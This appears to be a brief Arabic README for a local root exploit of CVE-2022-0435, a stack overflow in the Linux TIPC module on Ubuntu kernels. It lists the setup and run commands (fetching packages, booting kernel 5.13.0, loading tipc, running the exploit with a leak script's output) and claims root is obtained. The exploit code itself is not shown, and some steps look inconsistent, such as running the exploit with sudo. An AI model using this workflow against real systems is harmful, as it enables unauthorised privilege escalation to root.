
استغلال تجاوز سعة المكدس لـ CVE-2022-0435 في وحدة TIPC، يوفر تصعيد امتيازات محلي إلى الجذر على نوى Ubuntu.
CVE-2022-0435 (تجاوز سعة المكدس)
wget https://releases.ubuntu.com/jammy/ubuntu-22.04.5-live-server-amd64.iso
mkdir kernel
wget http://archive.ubuntu.com/ubuntu/pool/main/o/openssl/libssl1.1_1.1.1f-1ubuntu2_amd64.deb
sudo dpkg -i *.deb
أعد التشغيل واختر 5.13.0-051300-generic
قم بتحميل exploit.c و leak.py
sudo modprobe tipc
sudo ./exploit $(sudo python3 leak.py)
تم الحصول على صلاحية الجذر